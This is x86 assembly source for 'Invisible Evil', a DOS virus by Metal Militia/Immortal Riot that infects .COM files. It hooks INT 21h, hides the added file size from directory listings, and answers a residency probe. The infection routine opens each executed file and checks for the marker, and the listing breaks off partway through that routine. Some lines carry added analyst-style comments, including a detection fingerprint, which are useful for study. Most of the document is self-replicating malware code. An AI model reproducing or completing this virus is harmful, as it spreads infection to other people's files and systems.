; Virusname : Invisible Evil
; Virusauthor: Metal Militia
; Virusgroup : Immortal Riot
; Origin : Sweden
;
; It's a memory-resident, stealth infector of .COM files.
; It checks for two NOPs a bit after the jmp to see whether a file is already
; infected or not, and for stealth it checks the seconds of the file time.
; No destructive routine included in this version, perhaps to come(?)
; Um!.. well, enjoy Insane Reality issue #4!
; I think that's all for now, outa here..
;
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; INVISIBLE EVIL!
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
virus segment
assume cs:virus,ds:virus,es:nothing
org 100h
start: db 0E9h,02,00,90h,90h ; Jmp to vstart
vstart equ $
call code_start ; call codie_startie
code_start:
pop si
sub si,offset code_start ; so we can use the lea command etc
jmp code_continue
db ' Our past is ' ; Lil' poem (?)
db ' our future! ' ; of mine
code_continue:
mov bp,si ; Now, put bp in si instead so bp's used
jmp load ; Jmp and go resident
old_21 dd ? ; Old int21 interrupt saved here
new_21: ; Replacement INT 21h handler installed by the resident copy (installer is in load, outside this view); every DOS call arrives here first
cmp ax,4b00h ; AX=4B00h: EXEC (load and run) -- the infection trigger
je exec1 ; hand the file to the infector via the near trampoline below
dir_thang:
cmp ah,11h ; AH=11h: FCB find-first
je hide_size ; directory listings take the size-stealth path
cmp ah,12h ; AH=12h: FCB find-next
je hide_size ; same path
cmp ax,3030h ; AX=3030h (get DOS version) doubles as the "already resident?" probe
jne do_old ; everything else passes straight through to the saved handler
mov bx,3030h ; answer the probe: BX=3030h on return means "resident" (detection note: INT 21h returning BX=3030h for AX=3030h fingerprints this handler)
do_old: jmp dword ptr cs:[(old_21-vstart)] ; tail-jump into the saved original vector; old_21-vstart is a CS-relative offset, i.e. CS is assumed to address vstart as offset 0
exec1: jmp exec ; trampoline: the conditional jumps above are short-range
do_dir: jmp dword ptr cs:[(old_21-vstart)] ; same indirect jump as do_old, but entered by CALL FAR from hide_size so the original handler's IRET lands back there
ret ; never reached: the original handler returns with IRET through the flags/CS/IP frame pushed at hide_size
hide_size:
pushf ; emulate an INT frame (flags, CS, IP) so the original handler's IRET returns to the cmp below
push cs
call do_dir ; run the real find-first / find-next
cmp al,00h ; AL=0 from the FCB find calls means a matching entry was written to the DTA
jz undocumented_get_FCB ; match found: decide whether to patch the entry
jmp dir_error ; no match: nothing to hide, return to caller
; (nothing has been pushed on this path, so the iret at dir_error is balanced)
undocumented_get_FCB:
push ax ; registers altered below; restored at not_inf
push bx
push es
mov ah,51h ; AH=51h: get current PSP segment in BX (not in the published DOS reference of the time, hence the label)
int 21h
mov es,bx ; ES = caller's PSP
cmp bx,es:[16h] ; PSP:16h holds the parent PSP segment; a PSP that is its own parent is presumably the author's test for the command shell (an internal DIR) -- inferred from the original comment
je fix_it_up ; only listings from the shell are stealthed
jmp not_inf ; other callers see the true size
fix_it_up:
mov bx,dx ; DS:DX = the caller's FCB (argument of find-first/next)
mov al,[bx] ; first FCB byte: 0FFh marks an extended FCB
push ax ; keep it across the DTA query
mov ah,2fh ; AH=2Fh: get DTA address in ES:BX (where the matched entry was written)
int 21h
pop ax
inc al ; 0FFh + 1 == 0  <=>  extended FCB
jz add_it
jmp normal_fcb
add_it:
add bx,7h ; extended-FCB results carry a 7-byte header before the drive byte
normal_fcb:
mov ax,es:[bx+17h] ; DTA+17h: low word of the entry's time field (drive byte at +0, directory entry at +1)
and ax,1fh ; keep the 5-bit "seconds/2" field; AH becomes 0
xor al,01h ; seconds/2 == 1 (2 seconds) is the infection marker this code looks for
jz go_on_and_do_it_strong ; marker present: hide the added bytes
jmp not_inf ; not marked: leave the entry alone
; (when the jz is taken AX == 0, which the sbb below relies on)
go_on_and_do_it_strong:
and byte ptr es:[bx+17h],0e0h ; zero the seconds field so the marker does not show in the listing
sub es:[bx+1dh],(vend-vstart) ; DTA+1Dh: low word of the file size; subtract the body length (vend is outside this view)
sbb es:[bx+1fh],ax ; DTA+1Fh: high word of the file size; AX is 0 here, so only the borrow propagates
not_inf:pop es ; restore what undocumented_get_FCB pushed
pop bx
pop ax
dir_error:
iret ; return to the INT 21h caller; on the hide_size path the frame pushed at hide_size
; was already consumed by the original handler's IRET
exec:
push ax ; push the stuff needed
push bx ; (as normally)
push cx
push dx
push di
push si
push ds
push es
infect:
mov ax,3d02h ; Open the file being
int 21h ; executed do that!
jc fuckitall ; If error, get the fuck
; out!
xchg ax,bx ; or.. mov bx,ax
push ds ; pusha
push cs ; push
pop ds ; pop!
mov ah,3fh ; Read from file
mov dx,(buffer-vstart) ; put in our buffer
mov cx,5h ; how much to read
int 21h ; do that
jc fuckitall ; If error, fuck it!
cmp word ptr cs:[(buffer-vstart)],5A4Dh ; Is it an .EXE?
je fuckitall ; If so, outa here..
cmp word ptr cs:[(buffer-vstart)],4D5Ah ; The other form?
je fuckitall ; (can be MZ or ZM)
; If so, outa here
cmp word ptr cs:[(buffer-vstart)+3],9090h ; Ok, is it
je fuckitall ; infect? If so,
; outa here
jmp next ; Move on..
fuckitall:
jmp homey2 ; Something screwed,
; outa dis thang..
next:
mov ax,5700h ; Get date/time
int 21h ; int me baaaabe!
mov word ptr cs:[(old_time-vstart)],cx ; save time
mov word ptr cs:[(old_date-vstart)],dx ; save date
mov ax,4202h ; ftpr to end
mov cx,0 ; get ftpr (filesize)
cwd ; or.. xor dx,dx
int 21h
jc fuckitall ; if error, fuck it!
mov cx,ax ; mov cx to ax
sub cx,3 ; for the jmp
jmp save_rest_of_len
db ' [INVISIBLE EVIL!] (c) Metal Militia/Immortal Riot '